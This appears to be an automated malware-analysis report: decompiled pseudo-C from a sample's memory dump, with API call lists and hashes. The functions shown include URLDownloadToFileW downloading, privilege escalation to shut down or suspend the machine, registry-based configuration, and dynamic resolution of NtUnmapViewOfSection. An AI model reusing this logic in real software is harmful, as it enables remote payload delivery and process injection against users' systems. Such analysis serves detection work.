                              0x004125ee
                              0x00412602
                              0x00000000
                              0x00412602
                              0x004125be
                              0x004125cd
                              0x00412638
                              0x0041263a
                              0x0041263a
                              0x00412d65
                              0x00412d71
                              0x00412d7d
                              0x00412d8a

                              APIs
                                • Part of subcall function 004132F7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00413304
                                • Part of subcall function 004132F7: OpenProcessToken.ADVAPI32(00000000), ref: 0041330B
                                • Part of subcall function 004132F7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0041331D
                                • Part of subcall function 004132F7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0041333C
                                • Part of subcall function 004132F7: GetLastError.KERNEL32 ref: 00413342
                              • ExitWindowsEx.USER32 ref: 0041263A
                              • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0041264F
                              • GetProcAddress.KERNEL32(00000000), ref: 00412656
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                              • String ID: PowrProf.dll$SetSuspendState
                              • API String ID: 1589313981-1420736420
                              • Opcode ID: 350056446d05354f6e1d0207a4dc78e2bbb0cfcb4a01c0bf18d00743483075e6
                              • Instruction ID: e6245df6452118ac941c9a456e50b357b4a0d59a13aba4ba33676c8a529c691a
                              • Opcode Fuzzy Hash: 350056446d05354f6e1d0207a4dc78e2bbb0cfcb4a01c0bf18d00743483075e6
                              • Instruction Fuzzy Hash: 6621487160430166CA04FBB6E967AEF22599F5030DF40583FB442A71E3EE7C8D59865E
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040D455, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                              Download Yara Rule
                              C-Code - Quality: 46%
                              			E0040D455() {
				signed int _v32;
				void* _t13;
				void* _t22;
				signed int _t61;
				void* _t63;
				void* _t64;
				void* _t66;

				_t63 = (_t61 & 0xfffffff8) - 0x20;
				while(1) {
					_v32 = _v32 & 0x00000000;
					_t52 = L00401F75(0x46c518);
					E00410275(_t10, "override",  &_v32);
					_t13 = _v32 - 1;
					if(_t13 == 0) {
						goto L5;
					}
					_t22 = _t13 - 1;
					if(_t22 == 0) {
						_push(1);
						_t67 = _t63 - 0x18;
						E00407352(0x46c500, _t63 - 0x18, _t52, __eflags, 0x46c500);
						_push(L"pth_unenc");
						E0041053C(0x80000001, L00401ECB(L00416C32( &_v32, 0x46c518)));
						L00401ED0();
						_push(1);
						E00402064(0x46c500, _t67 + 0x20 - 0x18, "3.1.5 Pro");
						_push("v");
						E00410497(0x46c518, L00401F75(0x46c518));
						L0040FB4B();
						ExitProcess(0);
					}
					_t74 = _t22 != 1;
					if(_t22 != 1) {
						L6:
						Sleep(0xbb8);
						continue;
					}
					E0040B107();
					L5:
					_push(1);
					_t64 = _t63 - 0x18;
					E00407352(0x46c500, _t64, _t52, _t74, 0x46c500);
					_push(L"pth_unenc");
					E0041053C(0x80000001, L00401ECB(L00416C32( &_v32, 0x46c518)));
					L00401ED0();
					_push(1);
					_t66 = _t64 + 0x20 - 0x18;
					E00402064(0x46c500, _t66, "3.1.5 Pro");
					_push("v");
					E00410497(0x46c518, L00401F75(0x46c518));
					_t63 = _t66 + 0x20;
					goto L6;
				}
			}










                              0x0040d45b
                              0x0040d46a
                              0x0040d46a
                              0x0040d480
                              0x0040d482
                              0x0040d48d
                              0x0040d490
                              0x00000000
                              0x00000000
                              0x0040d492
                              0x0040d495
                              0x0040d514
                              0x0040d516
                              0x0040d51c
                              0x0040d521
                              0x0040d53f
                              0x0040d54b
                              0x0040d550
                              0x0040d55c
                              0x0040d561
                              0x0040d56f
                              0x0040d577
                              0x0040d57e
                              0x0040d57e
                              0x0040d497
                              0x0040d49a
                              0x0040d504
                              0x0040d509
                              0x00000000
                              0x0040d509
                              0x0040d49c
                              0x0040d4a1
                              0x0040d4a1
                              0x0040d4a3
                              0x0040d4a9
                              0x0040d4ae
                              0x0040d4cc
                              0x0040d4d8
                              0x0040d4dd
                              0x0040d4df
                              0x0040d4e9
                              0x0040d4ee
                              0x0040d4fc
                              0x0040d501
                              0x00000000
                              0x0040d501

                              APIs
                                • Part of subcall function 00410275: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00410295
                                • Part of subcall function 00410275: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000), ref: 004102B3
                                • Part of subcall function 00410275: RegCloseKey.ADVAPI32(?), ref: 004102BE
                              • Sleep.KERNEL32(00000BB8), ref: 0040D509
                              • ExitProcess.KERNEL32 ref: 0040D57E
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: CloseExitOpenProcessQuerySleepValue
                              • String ID: 3.1.5 Pro$override$pth_unenc
                              • API String ID: 2281282204-3883831071
                              • Opcode ID: f2bf34d3341e83af67d9b93607e30dbd5e6aba972c6e2b026673583f8c8e9742
                              • Instruction ID: c40a5223718f3a957b604b9da94b8c1faed2f64ca342b4f7b91d7ee91612d3b8
                              • Opcode Fuzzy Hash: f2bf34d3341e83af67d9b93607e30dbd5e6aba972c6e2b026673583f8c8e9742
                              • Instruction Fuzzy Hash: F221F371F4030027D608BAB68D57B6E3556ABC0718F50443EF9026B2D2FEBD9A44879F
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0044926C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
                              Download Yara Rule
                              C-Code - Quality: 94%
                              			E0044926C(void* __ecx, signed int _a4, intOrPtr _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					_t12 = _a8 + 8; // 0xfde8fe81
					if(GetLocaleInfoW( *_t12, 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = 0x459f98;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = 0x459fa0;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E0043604F(_t23, _t23);
									goto L25;
								}
								_t8 = _a8 + 8; // 0xfde8fe81
								if(GetLocaleInfoW( *_t8, 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}
















                              0x00449271
                              0x00449272
                              0x00449279
                              0x0044931d
                              0x0044932b
                              0x00449336
                              0x0044933c
                              0x00449341
                              0x00449343
                              0x00449343
                              0x00449349
                              0x0044934e
                              0x0044934e
                              0x00449338
                              0x00449338
                              0x00000000
                              0x00449338
                              0x0044927f
                              0x00449284
                              0x00000000
                              0x00000000
                              0x0044928a
                              0x0044928f
                              0x00449291
                              0x00449291
                              0x00449297
                              0x00000000
                              0x00000000
                              0x0044929c
                              0x004492b3
                              0x004492b3
                              0x004492bc
                              0x004492be
                              0x00000000
                              0x00000000
                              0x004492c0
                              0x004492c5
                              0x004492c7
                              0x004492c7
                              0x004492cd
                              0x00000000
                              0x00000000
                              0x004492d2
                              0x004492f0
                              0x004492f2
                              0x00449315
                              0x00000000
                              0x0044931a
                              0x00449302
                              0x0044930d
                              0x00000000
                              0x00000000
                              0x0044930f
                              0x00000000
                              0x0044930f
                              0x004492d4
                              0x004492dc
                              0x00000000
                              0x00000000
                              0x004492de
                              0x004492e1
                              0x004492e7
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004492e9
                              0x004492eb
                              0x004492ed
                              0x00000000
                              0x004492ed
                              0x0044929e
                              0x004492a6
                              0x00000000
                              0x00000000
                              0x004492a8
                              0x004492ab
                              0x004492b1
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004492b1
                              0x004492b7
                              0x004492b9
                              0x00000000

                              APIs
                              • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0044958B,?,00000000), ref: 00449305
                              • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0044958B,?,00000000), ref: 0044932E
                              • GetACP.KERNEL32(?,?,0044958B,?,00000000), ref: 00449343
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: InfoLocale
                              • String ID: ACP$OCP
                              • API String ID: 2299586839-711371036
                              • Opcode ID: 46287128e20fa306cd593820d674ce5555d7ecb4dfbfa4eea6010efed54f43df
                              • Instruction ID: 570c54974e689fd34d1e6bcab7248841df2efce4c8a6e9186f0595708dde5153
                              • Opcode Fuzzy Hash: 46287128e20fa306cd593820d674ce5555d7ecb4dfbfa4eea6010efed54f43df
                              • Instruction Fuzzy Hash: C1212822600101BBFB30CF64C802A9773A6FF59F55B568866ED09D7341E776DD01E398
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040D41E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 23COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E0040D41E(void** __ecx) {
				void* _t3;
				long _t4;
				void** _t5;
				struct HRSRC__* _t7;

				_t5 = __ecx;
				_t7 = FindResourceA(0, "SETTINGS", 0xa);
				_t3 = LockResource(LoadResource(0, _t7));
				_t4 = SizeofResource(0, _t7);
				 *_t5 = _t3;
				return _t4;
			}







                              0x0040d42a
                              0x0040d432
                              0x0040d43e
                              0x0040d449
                              0x0040d450
                              0x0040d454

                              APIs
                              • FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 0040D42C
                              • LoadResource.KERNEL32(00000000,00000000,?,?,?,0040CFD9), ref: 0040D437
                              • LockResource.KERNEL32(00000000,?,?,?,0040CFD9), ref: 0040D43E
                              • SizeofResource.KERNEL32(00000000,00000000,?,?,?,0040CFD9), ref: 0040D449
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: Resource$FindLoadLockSizeof
                              • String ID: SETTINGS
                              • API String ID: 3473537107-594951305
                              • Opcode ID: c908c3803409cf7171344093e449dd1e134e4aad92bc91585c3c664446313f73
                              • Instruction ID: 24a513b8d2ab5e094724d90079fe90a958381d8b28c7bf08dd7741c770137eef
                              • Opcode Fuzzy Hash: c908c3803409cf7171344093e449dd1e134e4aad92bc91585c3c664446313f73
                              • Instruction Fuzzy Hash: A3E0EC72740350BBD6201BA16C5DF4B6A68DB85FA3F000465F601CA1D5CAB5C9008B65
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00449440, Relevance: 7.7, APIs: 5, Instructions: 188COMMON
                              Download Yara Rule
                              C-Code - Quality: 89%
                              			E00449440(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed int _a4, short* _a8, short* _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed int* _v24;
				short* _v28;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed int* _t46;
				signed int _t47;
				short* _t48;
				int _t49;
				short* _t56;
				short* _t57;
				short* _t58;
				int _t66;
				int _t68;
				short* _t72;
				intOrPtr _t75;
				void* _t77;
				short* _t78;
				intOrPtr _t85;
				short* _t89;
				short* _t92;
				void* _t94;
				short** _t102;
				short* _t103;
				signed int _t105;
				signed short _t108;
				signed int _t109;
				void* _t110;

				_t39 =  *0x46a00c; // 0x5d382218
				_v8 = _t39 ^ _t109;
				_t89 = _a12;
				_t105 = _a4;
				_v28 = _a8;
				_v24 = E00440972(_t89, __ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E00440972(_t89, __ecx, __edx);
				_t99 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
				_t92 = _t105 + 0x80;
				_t46 = _v24;
				 *_t46 = _t105;
				_t102 =  &(_t46[1]);
				 *_t102 = _t92;
				if(_t92 != 0 &&  *_t92 != 0) {
					_t85 =  *0x459f94; // 0x17
					E004493E3(0, 0x459e80, _t85 - 1, _t102);
					_t46 = _v24;
					_t110 = _t110 + 0xc;
					_t99 = 0;
				}
				_v20 = _t99;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t99) {
					_t48 =  *_t102;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t99;
					if( *_t48 == _t99) {
						goto L19;
					}
					L00448D80(_t92, _t99,  &_v20);
					_pop(_t92);
					goto L20;
				} else {
					_t72 =  *_t102;
					if(_t72 == 0 ||  *_t72 == _t99) {
						L00448E66(_t92, _t99,  &_v20);
					} else {
						L00448DCB(_t92, _t99,  &_v20);
					}
					_pop(_t92);
					if(_v20 != 0) {
						_t103 = 0;
						__eflags = 0;
						goto L25;
					} else {
						_t75 =  *0x459e7c; // 0x41
						_t77 = E004493E3(_t99, 0x459b70, _t75 - 1, _v24);
						_t110 = _t110 + 0xc;
						if(_t77 == 0) {
							L20:
							_t103 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								L25:
								asm("sbb esi, esi");
								_t108 = E0044926C(_t92,  ~_t105 & _t105 + 0x00000100,  &_v20);
								_pop(_t94);
								__eflags = _t108;
								if(_t108 == 0) {
									goto L22;
								}
								__eflags = _t108 - 0xfde8;
								if(_t108 == 0xfde8) {
									goto L22;
								}
								__eflags = _t108 - 0xfde9;
								if(_t108 == 0xfde9) {
									goto L22;
								}
								_t56 = IsValidCodePage(_t108 & 0x0000ffff);
								__eflags = _t56;
								if(_t56 == 0) {
									goto L22;
								}
								_t57 = IsValidLocale(_v16, 1);
								__eflags = _t57;
								if(_t57 == 0) {
									goto L22;
								}
								_t58 = _v28;
								__eflags = _t58;
								if(__eflags != 0) {
									 *_t58 = _t108;
								}
								E004412C5(_t89, _t94, _t99, _t103, _t108, __eflags, _v16,  &(_v24[0x94]), 0x55, _t103);
								__eflags = _t89;
								if(__eflags == 0) {
									L36:
									L23:
									return E0042F61B(_v8 ^ _t109);
								}
								_t33 =  &(_t89[0x90]); // 0x43d072
								E004412C5(_t89, _t94, _t99, _t103, _t108, __eflags, _v16, _t33, 0x55, _t103);
								_t66 = GetLocaleInfoW(_v16, 0x1001, _t89, 0x40);
								__eflags = _t66;
								if(_t66 == 0) {
									goto L22;
								}
								_t36 =  &(_t89[0x40]); // 0x43cfd2
								_t68 = GetLocaleInfoW(_v12, 0x1002, _t36, 0x40);
								__eflags = _t68;
								if(_t68 == 0) {
									goto L22;
								}
								_t38 =  &(_t89[0x80]); // 0x43d052
								E0043A76D(_t38, _t108, _t38, 0x10, 0xa);
								goto L36;
							}
							L22:
							goto L23;
						}
						_t78 =  *_t102;
						_t103 = 0;
						if(_t78 == 0 ||  *_t78 == 0) {
							L00448E66(_t92, _t99,  &_v20);
						} else {
							L00448DCB(_t92, _t99,  &_v20);
						}
						_pop(_t92);
						goto L21;
					}
				}
			}



































                              0x00449448
                              0x0044944f
                              0x00449456
                              0x0044945a
                              0x0044945e
                              0x0044946c
                              0x00449471
                              0x00449472
                              0x00449473
                              0x00449474
                              0x0044947c
                              0x0044947e
                              0x00449484
                              0x0044948a
                              0x0044948d
                              0x0044948f
                              0x00449492
                              0x00449496
                              0x0044949d
                              0x004494aa
                              0x004494af
                              0x004494b2
                              0x004494b5
                              0x004494b5
                              0x004494b7
                              0x004494ba
                              0x004494be
                              0x0044952e
                              0x00449530
                              0x00449532
                              0x00449545
                              0x00449545
                              0x0044954c
                              0x00449552
                              0x00449555
                              0x00000000
                              0x00449555
                              0x00449534
                              0x00449537
                              0x00000000
                              0x00000000
                              0x0044953d
                              0x00449542
                              0x00000000
                              0x004494c5
                              0x004494c5
                              0x004494c9
                              0x004494df
                              0x004494d0
                              0x004494d4
                              0x004494d4
                              0x004494e8
                              0x004494e9
                              0x00449573
                              0x00449573
                              0x00000000
                              0x004494ef
                              0x004494ef
                              0x004494fe
                              0x00449503
                              0x00449508
                              0x00449558
                              0x00449558
                              0x00449558
                              0x0044955a
                              0x0044955e
                              0x00449575
                              0x00449581
                              0x0044958b
                              0x0044958e
                              0x0044958f
                              0x00449591
                              0x00000000
                              0x00000000
                              0x00449593
                              0x00449599
                              0x00000000
                              0x00000000
                              0x0044959b
                              0x004495a1
                              0x00000000
                              0x00000000
                              0x004495a7
                              0x004495ad
                              0x004495af
                              0x00000000
                              0x00000000
                              0x004495b6
                              0x004495bc
                              0x004495be
                              0x00000000
                              0x00000000
                              0x004495c0
                              0x004495c3
                              0x004495c5
                              0x004495c7
                              0x004495c7
                              0x004495d8
                              0x004495dd
                              0x004495df
                              0x0044963f
                              0x00449562
                              0x00449572
                              0x00449572
                              0x004495e4
                              0x004495ee
                              0x004495fe
                              0x00449604
                              0x00449606
                              0x00000000
                              0x00000000
                              0x0044960e
                              0x0044961d
                              0x00449623
                              0x00449625
                              0x00000000
                              0x00000000
                              0x0044962f
                              0x00449637
                              0x00000000
                              0x0044963c
                              0x00449560
                              0x00000000
                              0x00449560
                              0x0044950a
                              0x0044950c
                              0x00449510
                              0x00449526
                              0x00449517
                              0x0044951b
                              0x0044951b
                              0x0044952b
                              0x00000000
                              0x0044952b
                              0x004494e9

                              APIs
                                • Part of subcall function 00440972: GetLastError.KERNEL32(00000000,?,00434E55,?,?,?,00439275,?,00428772,00000000,?,00000000,?,?,00428772), ref: 00440976
                                • Part of subcall function 00440972: _free.LIBCMT ref: 004409A9
                                • Part of subcall function 00440972: SetLastError.KERNEL32(00000000,00439275,?,00428772,00000000,?,00000000,?,?,00428772), ref: 004409EA
                                • Part of subcall function 00440972: _abort.LIBCMT ref: 004409F0
                                • Part of subcall function 00440972: _free.LIBCMT ref: 004409D1
                                • Part of subcall function 00440972: SetLastError.KERNEL32(00000000,00439275,?,00428772,00000000,?,00000000,?,?,00428772), ref: 004409DE
                              • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0044954C
                              • IsValidCodePage.KERNEL32(00000000), ref: 004495A7
                              • IsValidLocale.KERNEL32(?,00000001), ref: 004495B6
                              • GetLocaleInfoW.KERNEL32(?,00001001,0043CF52,00000040,?,0043D072,00000055,00000000,?,?,00000055,00000000), ref: 004495FE
                              • GetLocaleInfoW.KERNEL32(?,00001002,0043CFD2,00000040), ref: 0044961D
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                              • String ID:
                              • API String ID: 745075371-0
                              • Opcode ID: 4f29291a398986d9b346dab9a49201bc34959112b7168d17cffe74ad61a86425
                              • Instruction ID: 8a1905ba9bd6499ab3f410366c50d1caeed45d39038b25d0bae0cc1b30d53ac2
                              • Opcode Fuzzy Hash: 4f29291a398986d9b346dab9a49201bc34959112b7168d17cffe74ad61a86425
                              • Instruction Fuzzy Hash: 67517172A00209ABFF11DFA5DC41ABF73B8AF04701F14046AE915E7291E778DE01DB69
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00441069, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
                              Download Yara Rule
                              APIs
                              • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0043C9B0,?,00000004), ref: 004410BC
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: InfoLocale
                              • String ID: GetLocaleInfoEx$@
                              • API String ID: 2299586839-3007343520
                              • Opcode ID: e28a724808ccbae7fec18c7bc115137aef7f827691145524245741caf7b7c823
                              • Instruction ID: a7f704755b5d2e67fe8756e3b063992e3f12ebeeb1607a3b83353fcb2a10ec15
                              • Opcode Fuzzy Hash: e28a724808ccbae7fec18c7bc115137aef7f827691145524245741caf7b7c823
                              • Instruction Fuzzy Hash: ADF02B31700208FBDB116F61DC02F6F7B60EF44B01F50412AFC05272A2DB798D649A9E
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0041242F, Relevance: 3.1, APIs: 2, Instructions: 66sleepfilenetworkCOMMON
                              Download Yara Rule
                              C-Code - Quality: 77%
                              			E0041242F(signed int __eax, void* __ebx, void* __ecx, void* __ebp, char _a12, char _a16, char _a20, char _a32, void* _a112, void* _a136) {
				char _v0;
				intOrPtr* _t16;
				void* _t18;
				void* _t22;
				void* _t31;
				void* _t49;
				void* _t56;
				void* _t61;

				_t31 = __ebx;
				_pop(_t49);
				 *__eax =  *__eax | __eax;
				asm("rcl dword [ebx+0x24e9ffff], cl");
				 *(__eax + __ecx) =  *(__eax + __ecx) | __eax + __ecx;
				 *((intOrPtr*)(_t49 + 0x64)) =  *((intOrPtr*)(_t49 + 0x64)) + __ecx;
				do {
					Sleep(0x64);
					_t61 =  *0x46bd6c - _t31; // 0x0
				} while (_t61 != 0);
				_t16 = L00401F75(L00401E29( &_a20, _t49, _t61, 0));
				_t18 = L00401F75(L00401E29( &_a16, _t49, _t61, 1));
				_t50 =  *_t16;
				E004179B3( &_a32,  *_t16, _t18);
				_t22 = L00401F75(L00401E29( &_a12,  *_t16, _t61, 2));
				__imp__URLDownloadToFileW(0, _t22, L00401ECB( &_a32), 0, 0);
				_t62 = _t22;
				if(_t22 == 0) {
					E00407352(0, _t56 - 0x18, _t50, _t62,  &_a20);
					E0040B465();
				}
				L00401ED0();
				L00401E54( &_v0, _t50);
				L00401FA7();
				L00401FA7();
				return 0;
			}











                              0x0041242f
                              0x0041242f
                              0x00412430
                              0x00412434
                              0x0041243a
                              0x0041243c
                              0x0041243d
                              0x0041243f
                              0x00412445
                              0x00412445
                              0x0041245b
                              0x0041246f
                              0x00412474
                              0x0041247b
                              0x0041249a
                              0x004124a1
                              0x004124a7
                              0x004124a9
                              0x004124b9
                              0x004124be
                              0x004124c3
                              0x00412b2a
                              0x00412d65
                              0x00412d71
                              0x00412d7d
                              0x00412d8a

                              APIs
                              • Sleep.KERNEL32 ref: 0041243F
                              • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004124A1
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: DownloadFileSleep
                              • String ID:
                              • API String ID: 1931167962-0
                              • Opcode ID: 54b4a893ada7f1f6ad4a0e2a5354f4fb2dcd91b2d7c7171089b06096d538c4a8
                              • Instruction ID: 3a50cae3c82b3ce372d535e7f9d3fad8a6779efd93a680446f7f936b56fe5819
                              • Opcode Fuzzy Hash: 54b4a893ada7f1f6ad4a0e2a5354f4fb2dcd91b2d7c7171089b06096d538c4a8
                              • Instruction Fuzzy Hash: CA1175715083019BC714FF72D8569AE73A4AF50308F40087FF842961E2EF7C9949C65A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0044697D, Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: HeapProcess
                              • String ID:
                              • API String ID: 54951025-0
                              • Opcode ID: c8a6c7df5d08b87816ed76a02ba7c524f2a39d67e6166e759cef680a43040ea0
                              • Instruction ID: 28f866089aaf05a4cb9890c2cb3393caa779ee160297bb8b3d9052280f0245bb
                              • Opcode Fuzzy Hash: c8a6c7df5d08b87816ed76a02ba7c524f2a39d67e6166e759cef680a43040ea0
                              • Instruction Fuzzy Hash: 05A001706057018B97508FBAAA4920A3AA9AA466D27158079A405C5A61EB74C9909B8A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040D072, Relevance: 82.3, APIs: 28, Strings: 19, Instructions: 98libraryloaderCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E0040D072() {
				_Unknown_base(*)()* _t2;
				_Unknown_base(*)()* _t24;

				_t2 = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExA");
				 *0x46bd2c = _t2;
				if(_t2 == 0) {
					 *0x46bd2c = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExA");
				}
				 *0x46bd20 = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExW");
				if( *0x46bd2c == 0) {
					 *0x46bd20 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExW");
				}
				 *0x46bd28 = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection");
				 *0x46bd14 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
				 *0x46beac = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				 *0x46beb0 = GetProcAddress(GetModuleHandleA("kernel32"), "GetComputerNameExW");
				 *0x46bd24 = GetProcAddress(GetModuleHandleA("Shell32"), "IsUserAnAdmin");
				 *0x46bd18 = GetProcAddress(GetModuleHandleA("kernel32"), "SetProcessDEPPolicy");
				 *0x46bd30 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayDevicesW");
				 *0x46bd34 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayMonitors");
				 *0x46bd1c = GetProcAddress(GetModuleHandleA("user32"), "GetMonitorInfoW");
				_t24 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
				 *0x46bd10 = _t24;
				return _t24;
			}





                              0x0040d08e
                              0x0040d096
                              0x0040d09d
                              0x0040d0ae
                              0x0040d0ae
                              0x0040d0c9
                              0x0040d0ce
                              0x0040d0df
                              0x0040d0df
                              0x0040d0fd
                              0x0040d111
                              0x0040d125
                              0x0040d139
                              0x0040d14d
                              0x0040d161
                              0x0040d175
                              0x0040d189
                              0x0040d19a
                              0x0040d1a2
                              0x0040d1a6
                              0x0040d1ac

                              APIs
                              • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExA,00000000,0046C548,00000001,0040C86E), ref: 0040D085
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D08E
                              • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA), ref: 0040D0A9
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D0AC
                              • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW), ref: 0040D0BD
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D0C0
                              • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW), ref: 0040D0DA
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D0DD
                              • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 0040D0EE
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D0F1
                              • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 0040D102
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D105
                              • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 0040D116
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D119
                              • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW), ref: 0040D12A
